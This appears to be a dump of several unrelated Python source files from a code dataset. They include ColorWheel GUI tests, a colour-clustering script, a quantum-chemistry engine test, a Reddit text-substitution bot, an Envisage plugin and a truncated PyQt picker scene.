# Maps platform names to the corresponding module registry classes.
_PLATFORM_MAPPING = {
_Gce.NAME: _Gce,
}
@classmethod
def _get(cls):
"""Returns the appropriate interface class for platform-specific
imports.
Returns:
class: The corresponding platform-specific interface class.
"""
return cls._PLATFORM_MAPPING.get(vmconf.PLATFORM)
@classmethod
def import_metadata_services(cls):
"""Imports and returns metadata_services module.
Returns:
module. The metadata_services module.
"""
return cls._get().import_metadata_services()
| 1.921875 | 2 |
cellpack/mgl_tools/DejaVu/Tests/test_ColorWheel.py | mesoscope/cellpack | 0 | 12766419 | ## Automatically adapted for numpy.oldnumeric Jul 23, 2007 by
#
#
# $Id: test_ColorWheel.py,v 1.5 2007/12/28 22:50:04 vareille Exp $
#
#
import Tkinter
import numpy
import numpy.oldnumeric as Numeric, math
import DejaVu.colorTool
import DejaVu.Slider
from DejaVu.EventHandler import CallbackFunctions
import unittest
from DejaVu.ColorWheel import ColorWheel
from DejaVu.colorTool import ToRGB,ToHSV
def MyCallback(color):
print color
def MyCallback2(color):
print 'hello'
class ColorWheel_BaseTests(unittest.TestCase):
def test_colorwheel_visible(self):
"""check that one colorwheel is visible after building 3
"""
root = Tkinter.Tk()
cw = ColorWheel(root)
cw.AddCallback(MyCallback)
cw1 = ColorWheel(root, immediate=0)
cw1.AddCallback(MyCallback2)
cw2 = ColorWheel(root, immediate=0)
cw1.AddCallback(MyCallback)
cw2.AddCallback(MyCallback2)
root.wait_visibility(cw.canvas)
root.wait_visibility(cw1.canvas)
root.wait_visibility(cw2.canvas)
self.assertEqual(cw.canvas.master.winfo_ismapped(),True)
self.assertEqual(root.winfo_ismapped(),True)
root.destroy()
def test_colorwheel_add_remove_callback(self):
root = Tkinter.Tk()
cw = ColorWheel(root)
cw.AddCallback(MyCallback)
root.wait_visibility(cw.canvas)
self.assertEqual(len(cw.callbacks),1)
cw.RemoveCallback(MyCallback)
self.assertEqual(len(cw.callbacks),0)
root.destroy()
def test_colorwheel_height(self):
"""check height of colorwheel
"""
root = Tkinter.Tk()
cw = ColorWheel(root)
cw.height = 120
cw.AddCallback(MyCallback)
root.wait_visibility(cw.canvas)
#apparently there is a 10 pixel border on each edge:
self.assertEqual(cw.canvas.cget('height'), str(100))
root.destroy()
def test_colorwheel_cursor(self):
"""tests color wheel,moving cursor
"""
root = Tkinter.Tk()
cw = ColorWheel(root)
old_x = cw.cursorX
old_y = cw.cursorY
cw._MoveCursor(25,25)
new_x = cw.cursorX
new_y = cw.cursorY
root.wait_visibility(cw.canvas)
self.assertEqual(old_x != new_x,True)
self.assertEqual(old_y != new_y,True)
root.destroy()
def test_colorwheel_color_1(self):
"""test colorwheel,colors after moving cursor
"""
root = Tkinter.Tk()
cw = ColorWheel(root)
old_color = cw.hsvColor
cw._MoveCursor(25,25)
new_color = cw.hsvColor
root.wait_visibility(cw.canvas)
#self.assertEqual(old_color,new_color)
self.assertTrue(numpy.alltrue(old_color==new_color))
cw.Set((1.0,0.0,0.0),mode = 'RGB')
mycolor = ToRGB(cw.Get())
mycol =[]
for i in range(0,4):
mycol.append(round(mycolor[i]))
self.assertEqual(mycol,[1.0,0.0,0.0,1.0])
root.destroy()
def test_colorwheel_color_HSV(self):
"""test colorwheel,when mode is hsv
"""
root = Tkinter.Tk()
cw = ColorWheel(root)
cw.Set((1.0,0.0,0.0),mode = 'HSV')
root.wait_visibility(cw.canvas)
self.assertEqual(cw.hsvColor,[1.0, 0.0, 0.0, 1.0])
self.assertEqual(cw.cursorX,50)
self.assertEqual(cw.cursorY,50)
root.destroy()
def test_colorwheel_color_RGB(self):
"""test colorwheel,when mode is rgb
"""
root = Tkinter.Tk()
cw = ColorWheel(root)
cw.Set((1.0,0.0,0.0),mode = 'RGB')
root.wait_visibility(cw.canvas)
self.assertEqual(cw.cursorX,100)
self.assertEqual(cw.cursorY,50)
self.assertEqual(cw.hsvColor[:3] != [1.0, 0.0, 0.0],True)
root.destroy()
def test_colorwheel_Wysiwyg(self):
"""test colorwheel,when Wysiwyg On
"""
root = Tkinter.Tk()
cw = ColorWheel(root)
cw.Set((1.0,0.0,0.0),mode = 'HSV')
#when on wheel colors are recomputed
cw.setWysiwyg(1)
root.wait_visibility(cw.canvas)
self.assertEqual(cw.hsvColor == [1.0, 0.0, 0.0, 1.0],True)
cw.setWysiwyg(0)
#root.wait_visibility(cw.canvas)
self.assertEqual(cw.hsvColor[:3] != [1.0, 0.0, 0.0],True)
root.destroy()
def test_colorwheel_keyword_arguements(self):
"""tests setting keyword arguements in colorwheel
"""
root = Tkinter.Tk()
cw = ColorWheel(root,circles = 20,stripes = 20,width =160,height =160)
self.assertEqual(cw.circles,20)
self.assertEqual(cw.width,160)
self.assertEqual(cw.height,160)
self.assertEqual(cw.stripes,20)
root.destroy()
if __name__ == '__main__':
unittest.main()
| 2.203125 | 2 |
get_color.py | Stardust2019/color_detection | 0 | 12766420 | <gh_stars>0
# -*- coding: utf-8 -*-
"""Untitled4.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1m75Wo1EiDbx-VZgELdYDgJsanmkE9pQb
"""
# Commented out IPython magic to ensure Python compatibility.
from sklearn.cluster import KMeans
import matplotlib.pyplot as plt
import numpy as np
import cv2
from collections import Counter
from skimage.color import rgb2lab, deltaE_cie76
# %matplotlib inline
image = cv2.imread('sample_image.jpg')
print("The type of this input is {}".format(type(image)))
plt.imshow(image)
# Commented out IPython magic to ensure Python compatibility.
# %cd '/content/drive/My Drive'
# Commented out IPython magic to ensure Python compatibility.
from sklearn.cluster import KMeans
import matplotlib.pyplot as plt
import numpy as np
import cv2
from collections import Counter
from skimage.color import rgb2lab, deltaE_cie76
import os
# %matplotlib inline
image = cv2.imread('sample_image.jpg')
print("The type of this input is {}".format(type(image)))
print("Shape: {}".format(image.shape))
plt.imshow(image)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
plt.imshow(image)
def RGB2HEX(color):
return "#{:02x}{:02x}{:02x}".format(int(color[0]), int(color[1]), int(color[2]))
def get_image(image_path):
image = cv2.imread(image_path)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
return image
def get_colors(image, number_of_colors, show_chart):
modified_image = cv2.resize(image, (600, 400), interpolation = cv2.INTER_AREA)
modified_image = modified_image.reshape(modified_image.shape[0]*modified_image.shape[1], 3)
clf = KMeans(n_clusters = number_of_colors)
labels = clf.fit_predict(modified_image)
counts = Counter(labels)
# sort to ensure correct color percentage
counts = dict(sorted(counts.items()))
center_colors = clf.cluster_centers_
# We get ordered colors by iterating through the keys
ordered_colors = [center_colors[i] for i in counts.keys()]
hex_colors = [RGB2HEX(ordered_colors[i]) for i in counts.keys()]
rgb_colors = [ordered_colors[i] for i in counts.keys()]
if (show_chart):
plt.figure(figsize = (8, 6))
plt.pie(counts.values(), labels = hex_colors, colors = hex_colors)
return rgb_colors
get_colors(get_image('sample_image.jpg'), 8, True)
'''IMAGE_DIRECTORY = 'images'
COLORS = {
'GREEN': [0, 128, 0],
'BLUE': [0, 0, 128],
'YELLOW': [255, 255, 0]
}
images = []
for file in os.listdir(IMAGE_DIRECTORY):
if not file.startswith('.'):
images.append(get_image(os.path.join(IMAGE_DIRECTORY, file)))
plt.figure(figsize=(20, 10))
for i in range(len(images)):
plt.subplot(1, len(images), i+1)
plt.imshow(images[i])'''
'''def match_image_by_color(image, color, threshold = 60, number_of_colors = 10):
image_colors = get_colors(image, number_of_colors, False)
selected_color = rgb2lab(np.uint8(np.asarray([[color]])))
select_image = False
for i in range(number_of_colors):
curr_color = rgb2lab(np.uint8(np.asarray([[image_colors[i]]])))
diff = deltaE_cie76(selected_color, curr_color)
if (diff < threshold):
select_image = True
return select_image
def show_selected_images(images, color, threshold, colors_to_match):
index = 1
for i in range(len(images)):
selected = match_image_by_color(images[i],
color,
threshold,
colors_to_match)
if (selected):
plt.subplot(1, 5, index)
plt.imshow(images[i])
index += 1
# Search for GREEN
plt.figure(figsize = (20, 10))
show_selected_images(images, COLORS['GREEN'], 60, 5)
# Search for BLUE
plt.figure(figsize = (20, 10))
show_selected_images(images, COLORS['BLUE'], 60, 5)'''
| 2.859375 | 3 |
env.py | ed-chin-git/hacker_nlp | 0 | 12766421 | replace this text with actual google credentials
| 0.949219 | 1 |
samples/test_gaussian.py | sergio-marti/ren-qm3 | 0 | 12766422 | import numpy
import qm3
import qm3.engines.gaussian
import io
import os
import sys
cwd = os.path.abspath( os.path.dirname( sys.argv[0] ) ) + os.sep
mol = qm3.molecule()
mol.pdb_read( open( cwd + "charmm.pdb" ) )
mol.psf_read( open( cwd + "charmm.psf" ) )
mol.guess_atomic_numbers()
print( mol.anum )
print( mol.chrg )
sqm = mol.resn == "WAT"
for a in [ "C6", "C9", "H11", "H12", "H13", "H14", "H15" ]:
sqm[mol.indx["A"][1][a]] = True
sqm = numpy.logical_not( sqm )
smm = mol.sph_sel( sqm, 12 )
sla = [ ( mol.indx["A"][1]["C10"], mol.indx["A"][1]["C6"] ) ]
f = io.StringIO( """%chk=gauss.chk
%mem=2048mb
%nproc=2
#p b3lyp/def2svp qm3_job qm3_guess charge prop=(field,read) scf=direct nosymm fchk
.
1 1
qm3_atoms
qm3_charges
qm3_field
""" )
mol.engines["qm"] = qm3.engines.gaussian.run( mol, f, sqm, smm, sla )
mol.engines["qm"].exe = ". ~/Devel/g09/pgi.imac64/g09.profile; g09 gauss.com"
mol.get_grad()
print( mol.func )
assert( numpy.fabs( mol.func - -697633.7375 ) < 0.001 ), "function error"
print( numpy.linalg.norm( mol.grad ) )
assert( numpy.fabs( numpy.linalg.norm( mol.grad ) - 575.7341 ) < 0.001 ), "gradient error"
print( numpy.linalg.norm( mol.grad[mol.indx["A"][1]["C10"]] ) )
assert( numpy.fabs( numpy.linalg.norm( mol.grad[mol.indx["A"][1]["C10"]] ) - 68.4270 ) < 0.001 ), "QM-LA gradient error"
| 1.820313 | 2 |
taboo.py | AdityaPandeyCS/ta13oo-reddit-bot | 1 | 12766423 | import praw
import re
import csv
import operator
import os
def process_comment(comment):
try:
body = comment.body
user = comment.author.name
linkID = comment.link_id
id = comment.id
parent = comment.parent()
# !delete
if (triggers[2] in body and isinstance(parent, commentType) and isinstance(parent.parent(), commentType)
and parent.author.name == 'F1N1ZH_EM_ZEL' and (parent.parent().author.name == user or 'adityapstar' in user)):
grandparentUser = parent.parent().author.name
parentBody = parent.body
parentLinkID = parent.link_id
parentID = parent.id
parent.delete()
print('Deleted: "{}" by u/{} ({}, {})'.format(parentBody, grandparentUser, parentLinkID, parentID))
open("comments.txt", "a").write(id + '\n')
return
# skip if already parsed
with open('comments.txt', 'r') as file:
if id in file.read().splitlines():
return
# keep track of number of times each user has called the bot
if user in users:
users[user] += 1
elif user != 'adityapstar':
users[user] = 1
with open('users.csv', 'w', newline='') as f:
w = csv.writer(f)
w.writerows(users.items())
sortedUsers = sorted(users.items(), key=operator.itemgetter(1), reverse=True)
nathans = 'u/ | bruh moments\n---|---\n🏆'
for username, val in sortedUsers:
if val > 1:
nathans += username.replace('_','\_') + ' | ' + str(val) + '\n'
if submission.selftext+'\n' != nathans:
submission.edit(nathans)
# determine which trigger
indexOfOriginal = body.find(triggers[0])
indexOfPlus = body.find(triggers[1])
if indexOfPlus == -1 or ((indexOfOriginal < indexOfPlus) and indexOfPlus != -1 and indexOfOriginal != -1):
trigger = triggers[0]
message = body[indexOfOriginal + 6:]
else:
trigger = triggers[1]
message = body[indexOfPlus + 6:]
# remove whitespace characters
message = removeNPC(message)
# remove leading spaces
pos = 0
for c in message:
if c == ' ':
pos += 1
else:
break
message = message[pos:]
# act on parent if comment is blank
if not message:
if (isinstance(parent, commentType)):
message = parent.body
else:
message = parent.title
# apply filters to parent
message = removeNPC(message)
# discourage repeated calls
if (message == "[HTTPZ://1.1MGUR.COM/CDTL4VX.G1F](https://i.imgur.com/cDTl4Vx.gif)"):
print("replied to kanye.gif")
comment.reply("[HTTPZ://1.1MGUR.COM/CDTL4VX.G1F](https://i.imgur.com/cDTl4Vx.gif)")
open("comments.txt", "a").write(id + '\n')
return
final = tabooify(message, trigger)
if len(final) > 9999:
print("u/{}'s comment was too long ({}, {}, {})".format(user, linkID, id, str(len(final))))
comment.reply("[HTTPZ://1.1MGUR.COM/CDTL4VX.G1F](https://i.imgur.com/cDTl4Vx.gif)")
open("comments.txt", "a").write(id + '\n')
return
# success
print('Replying to: "{}" by u/{} ({}, {})'.format(body, user, linkID, id))
comment.reply(final)
with open('comments.txt', 'a') as file:
file.write(id + '\n')
except Exception as e:
print("process_comment(): exception occurred")
print(e)
print('Tried replying to: "{}" by u/{} ({}, {})'.format(body, user, linkID, id))
open("comments.txt", "a").write(id + '\n')
return
def removeNPC(string):
return re.compile("​", re.IGNORECASE).sub("", string).replace(" ", "")
def applySwaps(swaps, message):
final = message
for swap in swaps:
final = final.replace(swap, swaps[swap])
return final
def tabooify(original, trigger):
original = original.upper()
if (trigger == triggers[0]):
swaps = {'B':'13','S':'Z','I':'1','#':'','13LACK METAL TERROR1ZT':'13 M T'}
else:
swaps = {'B':'13','S':'Z','I':'1','E':'3','O':'0','A':'4','T':'7','U':'V','#':''}
links = re.findall('\[.*?\]\((.*?)\)', original)
swaps.update({applySwaps(swaps, link):link for link in links})
final = original + " | " + applySwaps(swaps, original)
return final
if __name__ == '__main__':
triggers = ['!taboo', '+taboo', '!delete']
commentType = praw.models.reddit.comment.Comment
with open('users.csv','r') as f:
reader = csv.reader(f)
users = {rows[0]:int(rows[1]) for rows in reader}
print("logging in...")
reddit = praw.Reddit(user_agent=os.environ.get('USER_AGENT'),
client_id=os.environ.get('CLIENT_ID'), client_secret=os.environ.get('CLIENT_SECRET'),
username=os.environ.get('USER_NAME'), password=<PASSWORD>('PASSWORD'))
print("listening...")
subreddit = reddit.subreddit('hiphopcirclejerk+denzelcurry+test')
submission = reddit.submission(id='cfg95e')
for comment in subreddit.stream.comments():
if re.search("[!+]taboo", comment.body) or '!delete' in comment.body:
process_comment(comment)
| 2.890625 | 3 |
B03898_02_Codes/B03898_02_02.py | prakharShuklaOfficial/Mastering-Python-for-Finance-source-codes | 446 | 12766424 | <reponame>prakharShuklaOfficial/Mastering-Python-for-Finance-source-codes<filename>B03898_02_Codes/B03898_02_02.py
"""
README
======
This is a Python code.
======
"""
""" Least squares regression with statsmodels """
import numpy as np
import statsmodels.api as sm
# Generate some sample data
num_periods = 9
all_values = np.array([np.random.random(8)
for i in range(num_periods)])
# Filter the data
y_values = all_values[:, 0] # First column values as Y
x_values = all_values[:, 1:] # All other values as X
x_values = sm.add_constant(x_values) # Include the intercept
results = sm.OLS(y_values, x_values).fit() # Regress and fit the model
print results.summary()
print results.params
| 2.015625 | 2 |
slice_plotter.py | stockmann-lab/ASL_coil | 0 | 12766425 | <filename>slice_plotter.py<gh_stars>0
import numpy as np
import matplotlib.pyplot as plt
class Slice_Plotter:
def __init__(self, ax, X, title='', vmin=None, vmax=None, cmap=None, patches=None):
self.ax = ax
ax.set_title(title)
if cmap is None:
cmap = plt.get_cmap('rainbow')
cmap.set_bad('black')
if vmin is None:
vmin=np.nanmin(X)
if vmax is None:
vmax=np.nanmax(X)
self.X = X
self.rows, self.cols, self.slices = X.shape
self.ind = 0
if patches is None:
patches = [[] for _ in range(self.slices)]
self.patches = patches
self.im = ax.imshow(self.X[:, :, self.ind], vmin=vmin, vmax=vmax, cmap=cmap)
self.update()
def onscroll(self, event):
ind_max = self.slices
if event.button == 'up':
self.ind = (self.ind + 1)
else:
self.ind = (self.ind - 1)
if self.ind >= ind_max:
self.ind = ind_max - 1
if self.ind < 0:
self.ind = 0
self.ax.patches = []
self.update()
def update(self):
self.im.set_data(self.X[:, :, self.ind])
self.ax.set_ylabel('slice %s (scroll)' % self.ind)
self.ax.patches = []
for patch in self.patches[self.ind]:
self.ax.add_patch(patch)
self.im.axes.figure.canvas.draw()
def add_patch(self, patch, ind):
self.patches[ind].append(patch)
self.update()
def pop_patch(self, ind):
if len(self.patches[ind]) > 0:
self.patches[ind].pop()
self.update()
def quick_slice_plot(X, title='', cmap=None, vmin=None, vmax=None, patches=None):
quick_fig, quick_ax = plt.subplots(1, 1)
plotter_quick = Slice_Plotter(quick_ax, np.transpose(X, axes=(1, 0, 2)), title=title, cmap=cmap, patches=patches)
quick_fig.canvas.mpl_connect('scroll_event', plotter_quick.onscroll)
plt.show(block=True)
| 2.65625 | 3 |
pyatdllib/ui/too_big_protobuf_test.py | lisagorewitdecker/immaculater | 0 | 12766426 | """Unittests for module 'immaculater' that cannot live peaceably with immaculater_test.
This unittest is separate because once you call SetAllowOversizeProtos(True)
you cannot change it.
"""
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
import pipes
import gflags as flags # https://github.com/gflags/python-gflags
from pyatdllib.ui import serialization
from pyatdllib.ui import test_helper
FLAGS = flags.FLAGS
class TooBigProtobufTestCase(test_helper.TestHelper):
def setUp(self):
super().setUp()
FLAGS.pyatdl_allow_infinite_memory_for_protobuf = True
def testTooBigToSaveError(self):
FLAGS.pyatdl_allow_infinite_memory_for_protobuf = False
save_path = self._CreateTmpFile('')
inputs = ['loadtest -n 100',
'save %s' % pipes.quote(save_path)
]
self.helpTest(inputs, serialization.TooBigToSaveError)
if __name__ == '__main__':
test_helper.main()
| 2.265625 | 2 |
envisage/core_plugin.py | robmcmullen/envisage | 0 | 12766427 | """ The Envisage core plugin. """
# Enthought library imports.
from envisage.api import ExtensionPoint, Plugin, ServiceOffer
from traits.api import List, Instance, on_trait_change, Str
class CorePlugin(Plugin):
""" The Envisage core plugin.
The core plugin offers facilities that are generally useful when building
extensible applications such as adapters, categories and hooks etc. It does
not contain anything to do with user interfaces!
The core plugin should be started before any other plugin. It is up to
the plugin manager to do this.
"""
# Extension point Ids.
CATEGORIES = 'envisage.categories'
CLASS_LOAD_HOOKS = 'envisage.class_load_hooks'
PREFERENCES = 'envisage.preferences'
SERVICE_OFFERS = 'envisage.service_offers'
#### 'IPlugin' interface ##################################################
# The plugin's unique identifier.
id = 'envisage.core'
# The plugin's name (suitable for displaying to the user).
name = 'Core'
#### Extension points offered by this plugin ##############################
# Categories are actually implemented via standard 'ClassLoadHooks', but
# for (hopefully) readability and convenience we have a specific extension
# point.
categories = ExtensionPoint(
List(Instance('envisage.category.Category')),
id = CATEGORIES,
desc = """
Traits categories allow you to dynamically extend a Python class with
extra attributes, methods and events.
Contributions to this extension point allow you to import categories
*lazily* when the class to be extended is imported or created. Each
contribution contains the name of the category class that you want to
add (the 'class_name') and the name of the class that you want to
extend (the 'target_class_name').
e.g. To add the 'FooCategory' category to the 'Foo' class::
Category(
class_name = 'foo_category.FooCategory',
target_class_name = 'foo.Foo'
)
"""
)
@on_trait_change('categories_items')
def _categories_items_changed(self, event):
""" React to new categories being *added*.
Note that we don't currently do anything if categories are *removed*.
"""
self._add_category_class_load_hooks(event.added)
return
class_load_hooks = ExtensionPoint(
List(Instance('envisage.class_load_hook.ClassLoadHook')),
id = CLASS_LOAD_HOOKS,
desc = """
Class load hooks allow you to be notified when any 'HasTraits' class
is imported or created.
See the documentation for 'ClassLoadHook' for more details.
"""
)
@on_trait_change('class_load_hooks_items')
def _class_load_hooks_changed(self, event):
""" React to new class load hooks being *added*.
Note that we don't currently do anything if class load hooks are
*removed*.
"""
self._connect_class_load_hooks(event.added)
return
preferences = ExtensionPoint(
List(Str),
id = PREFERENCES,
desc = """
Preferences files allow plugins to contribute default values for
user preferences. Each contributed string must be the URL of a
file-like object that contains preferences values.
e.g.
'pkgfile://envisage/preferences.ini'
- this looks for the 'preferences.ini' file in the 'envisage'
package.
'file://C:/tmp/preferences.ini'
- this looks for the 'preferences.ini' file in 'C:/tmp'
'http://some.website/preferences.ini'
- this looks for the 'preferences.ini' document on the 'some.website'
web site!
The files themselves are parsed using the excellent 'ConfigObj'
package. For detailed documentation please go to:-
http://www.voidspace.org.uk/python/configobj.html
"""
)
@on_trait_change('preferences_items')
def _preferences_changed(self, event):
""" React to new preferencess being *added*.
Note that we don't currently do anything if preferences are *removed*.
"""
self._load_preferences(event.added)
return
service_offers = ExtensionPoint(
List(ServiceOffer),
id = SERVICE_OFFERS,
desc = """
Services are simply objects that a plugin wants to make available to
other plugins. This extension point allows you to offer services
that are created 'on-demand'.
e.g.
my_service_offer = ServiceOffer(
protocol = 'acme.IMyService',
factory = an_object_or_a_callable_that_creates_one,
properties = {'a dictionary' : 'that is passed to the factory'}
)
See the documentation for 'ServiceOffer' for more details.
"""
)
@on_trait_change('service_offers_items')
def _service_offers_changed(self, event):
""" React to new service offers being *added*.
Note that we don't currently do anything if services are *removed* as
we have no facility to let users of the service know that the offer
has been retracted.
"""
for service in event.added:
self._register_service_offer(service)
return
#### Contributions to extension points made by this plugin ################
# None.
###########################################################################
# 'IPlugin' interface.
###########################################################################
def start(self):
""" Start the plugin. """
# Load all contributed preferences files into the application's root
# preferences node.
self._load_preferences(self.preferences)
# Connect all class load hooks.
self._connect_class_load_hooks(self.class_load_hooks)
# Add class load hooks for all of the contributed categories. The
# category will be imported and added when the associated target class
# is imported/created.
self._add_category_class_load_hooks(self.categories)
# Register all service offers.
#
# These services are unregistered by the default plugin activation
# strategy (due to the fact that we store the service ids in this
# specific trait!).
self._service_ids = self._register_service_offers(self.service_offers)
return
###########################################################################
# Private interface.
###########################################################################
def _add_category_class_load_hooks(self, categories):
""" Add class load hooks for a list of categories. """
for category in categories:
class_load_hook = self._create_category_class_load_hook(category)
class_load_hook.connect()
return
def _connect_class_load_hooks(self, class_load_hooks):
""" Connect all class load hooks. """
for class_load_hook in class_load_hooks:
class_load_hook.connect()
return
def _create_category_class_load_hook(self, category):
""" Create a category class load hook. """
# Local imports.
from .class_load_hook import ClassLoadHook
def import_and_add_category(cls):
""" Import a category and add it to a class.
This is a closure that binds 'self' and 'category'.
"""
category_cls = self.application.import_symbol(category.class_name)
cls.add_trait_category(category_cls)
return
category_class_load_hook = ClassLoadHook(
class_name = category.target_class_name,
on_load = import_and_add_category
)
return category_class_load_hook
def _load_preferences(self, preferences):
""" Load all contributed preferences into a preferences node. """
# Enthought library imports.
from envisage.resource.api import ResourceManager
# We add the plugin preferences to the default scope. The default scope
# is a transient scope which means that (quite nicely ;^) we never
# save the actual default plugin preference values. They will only get
# saved if a value has been set in another (persistent) scope - which
# is exactly what happens in the preferences UI.
default = self.application.preferences.node('default/')
# The resource manager is used to find the preferences files.
resource_manager = ResourceManager()
for resource_name in preferences:
f = resource_manager.file(resource_name)
try:
default.load(f)
finally:
f.close()
return
def _register_service_offers(self, service_offers):
""" Register a list of service offers. """
return list(map(self._register_service_offer, service_offers))
def _register_service_offer(self, service_offer):
""" Register a service offer. """
service_id = self.application.register_service(
protocol = service_offer.protocol,
obj = service_offer.factory,
properties = service_offer.properties
)
return service_id
### EOF ######################################################################
| 2.015625 | 2 |
Contents/scripts/picapicker/scene.py | mochio326/PicaPicker | 2 | 12766428 | # -*- coding: utf-8 -*-
from .vendor.Qt import QtCore, QtGui, QtWidgets, QtSql
from .node import Picker, BgNode, GroupPicker
from .line import Line
class SaveData(object):
PICKER_TABLE_DATA = (('id', 'text PRIMARY KEY'),
('x', 'real'),
('y', 'real'),
('z', 'real'),
('width', 'integer'),
('height', 'integer'),
('node_name', 'text'),
('label', 'text'),
('bg_color', 'text')
)
GROUP_PICKER_TABLE_DATA = (('id', 'text PRIMARY KEY'),
('x', 'real'),
('y', 'real'),
('z', 'real'),
('width', 'integer'),
('height', 'integer'),
('member_nodes_id', 'text'),
('label', 'text'),
('bg_color', 'text')
)
BG_IMAGE_TABLE_DATA = (('id', 'text PRIMARY KEY'),
('x', 'real'),
('y', 'real'),
('z', 'real'),
('width', 'integer'),
('height', 'integer'),
('data', 'blob')
)
def __init__(self, scene):
self.scene = scene
def load(self, file_path):
self.scene.clear()
db = QtSql.QSqlDatabase.addDatabase('QSQLITE')
db.setDatabaseName(file_path)
db.open()
query = QtSql.QSqlQuery(db)
self._create_picker(query, 'picker', Picker)
self._create_picker(query, 'group_picker', GroupPicker)
self._create_bg_image(query, 'bg_image')
db.close()
def _create_picker(self, query, table_name, picker_cls):
query.exec_('SELECT * FROM {0}'.format(table_name))
if not query.isActive():
return
query.first()
while query.isValid():
_n = picker_cls()
self.scene.picker_init(_n, 1)
_n.load_data(query)
query.next()
def _create_bg_image(self, query, table_name):
query.exec_('SELECT * FROM {0}'.format(table_name))
if not query.isActive():
return
query.first()
while query.isValid():
_n = BgNode()
self.scene.add_item(_n)
_n.load_data(query)
_n.update()
query.next()
def _create_table(self, query, table_name, table_format, cls):
_table_format_str = ', '.join([" ".join(map(str, _f)) for _f in table_format])
_table_insert_value_format = ','.join(['?' for _ in table_format])
query.exec_('DROP TABLE IF EXISTS {0}'.format(table_name))
query.exec_('CREATE TABLE {0}({1})'.format(table_name, _table_format_str))
query.prepare('insert into {0} values ({1})'.format(table_name, _table_insert_value_format))
query.exec_()
for _n in self.scene.items():
if not isinstance(_n, cls):
continue
_data = _n.get_save_data()
for i, v in enumerate(_data):
query.bindValue(i, v)
query.exec_()
def save(self, file_path):
db = QtSql.QSqlDatabase.addDatabase('QSQLITE')
db.setDatabaseName(file_path)
db.open()
query = QtSql.QSqlQuery(db)
self._create_table(query, 'picker', self.PICKER_TABLE_DATA, Picker)
self._create_table(query, 'group_picker', self.GROUP_PICKER_TABLE_DATA, GroupPicker)
self._create_table(query, 'bg_image', self.BG_IMAGE_TABLE_DATA, BgNode)
db.close()
class Scene(QtWidgets.QGraphicsScene):
@property
def is_bg_image_selectable(self):
return self._is_bg_image_selectable
@is_bg_image_selectable.setter
def is_bg_image_selectable(self, val):
self._is_bg_image_selectable = val
for _n in self.items():
if not isinstance(_n, BgNode):
continue
if not self._is_bg_image_selectable:
_n.setSelected(False)
_n.set_selectable_flag_from_scene()
@property
def is_node_movable(self):
return self._is_node_movable
@is_node_movable.setter
def is_node_movable(self, val):
self._is_node_movable = val
for _n in self.items():
_n.set_movable_flag_from_scene()
def __init__(self):
super(Scene, self).__init__()
self.selectionChanged.connect(self.select_nodes)
self.enable_edit = True
self.lock_bg_image = False
self.draw_bg_grid = True
self._is_bg_image_selectable = False
self._is_node_movable = False
self.grid_width = 20
self.grid_height = 20
self.snap_to_node_flag = True
self.snap_to_grid_flag = False
self._snap_guide = {'x': None, 'y': None}
# memo
# itemをリストに入れて保持しておかないと
# 大量のitemが追加された際にPySideがバグってしまう事があった
self.add_items = []
def load(self, file_path=None):
_sd = SaveData(self)
if file_path is None:
file_path = r'C:\temp\picaPicker\sample.picap'
_sd.load(file_path)
def save(self, file_path=None):
_sd = SaveData(self)
if file_path is None:
file_path = r'C:\temp\picaPicker\sample.picap'
_sd.save(file_path)
def del_node_snapping_guide(self, type):
if self._snap_guide[type] is not None:
self.remove_item(self._snap_guide[type])
self._snap_guide[type] = None
def show_node_snapping_guide(self, pos_a, pos_b, type):
self.del_node_snapping_guide(type)
self._snap_guide[type] = Line(pos_a, pos_b)
self.add_item(self._snap_guide[type])
def picker_init(self, picker_instance, opacity=None):
# picker作った際に必要な初期設定を行っとく
self.add_item(picker_instance)
if opacity is not None:
picker_instance.setOpacity(opacity)
picker_instance.node_snapping.connect(self.show_node_snapping_guide)
picker_instance.node_snapped.connect(self.del_node_snapping_guide)
def node_snap_to_grid(self, node):
if not self.snap_to_grid_flag:
return
node.setX(node.x() - node.x() % self.grid_width)
node.setY(node.y() - node.y() % self.grid_height)
def select_nodes(self):
_target_dcc_nodes = []
self.blockSignals(True)
for _item in self.items():
if isinstance(_item, Picker):
_item.group_select = False
_item.update()
for _item in self.selectedItems():
if isinstance(_item, GroupPicker) and not _item.drag:
for _n in _item.get_member_nodes():
_n.group_select = True
_n.update()
_target_dcc_nodes.extend(_n.get_dcc_node())
elif isinstance(_item, Picker):
_target_dcc_nodes.extend(_item.get_dcc_node())
self.select_dcc_nodes(_target_dcc_nodes)
self.blockSignals(False)
def select_dcc_nodes(self, node_list):
# DCCツール側のノード選択処理
pass
def enable_edit_change(self):
for _i in self.items():
if isinstance(_i, (Picker, GroupPicker)):
_i.setFlag(QtWidgets.QGraphicsItem.ItemIsMovable, self.enable_edit)
elif isinstance(_i, BgNode):
_flg = self.enable_edit and not self.lock_bg_image
_i.movable = _flg
_i.setFlag(QtWidgets.QGraphicsItem.ItemIsMovable, _flg)
_i.setFlag(QtWidgets.QGraphicsItem.ItemIsSelectable, _flg)
def edit_bg_image_opacity(self, value):
for _i in self.items():
if isinstance(_i, BgNode):
_i.setOpacity(value)
def add_to_group(self):
_p = self.get_selected_pick_nodes()
for _g in self.get_selected_group_pick_nodes():
_g.add(_p)
def remove_from_group(self):
_p = self.get_selected_pick_nodes()
for _g in self.get_selected_group_pick_nodes():
_g.remove(_p)
def get_selected_pick_nodes(self):
return [_n for _n in self.selectedItems() if isinstance(_n, Picker)]
def get_selected_group_pick_nodes(self):
return [_n for _n in self.selectedItems() if isinstance(_n, GroupPicker)]
def get_selected_all_pick_nodes(self):
return [_n for _n in self.selectedItems() if isinstance(_n, (Picker, GroupPicker))]
def drawBackground(self, painter, rect):
if not self.draw_bg_grid:
return
scene_height = self.sceneRect().height()
scene_width = self.sceneRect().width()
# Pen.
pen = QtGui.QPen()
pen.setStyle(QtCore.Qt.SolidLine)
pen.setWidth(1)
pen.setColor(QtGui.QColor(80, 80, 80, 125))
sel_pen = QtGui.QPen()
sel_pen.setStyle(QtCore.Qt.SolidLine)
sel_pen.setWidth(1)
sel_pen.setColor(QtGui.QColor(125, 125, 125, 125))
grid_horizontal_count = int(round(scene_width / self.grid_width)) + 1
grid_vertical_count = int(round(scene_height / self.grid_height)) + 1
for x in range(0, grid_horizontal_count):
xc = x * self.grid_width
if x % 5 == 0:
